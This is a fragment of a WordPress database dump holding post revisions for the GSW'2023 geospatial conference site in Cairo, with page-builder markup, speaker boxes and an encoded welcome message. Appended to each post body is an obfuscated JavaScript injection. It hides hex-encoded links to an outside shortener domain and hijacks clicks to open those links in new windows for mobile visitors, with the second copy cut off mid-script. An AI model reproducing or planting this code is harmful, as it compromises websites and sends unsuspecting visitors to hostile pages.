_0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:03:02','2022-10-05 18:03:02','',2167,'https://gsw2023.com/?p=2298',0,'revision','',0),
(2299,1,'2022-10-05 18:03:42','2022-10-05 18:03:42','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklM0IlMjIlMkNzdHlsZSUzRCUyMmNvbG9yJTNBYmxhY2slMjIlM0IlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhdCUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 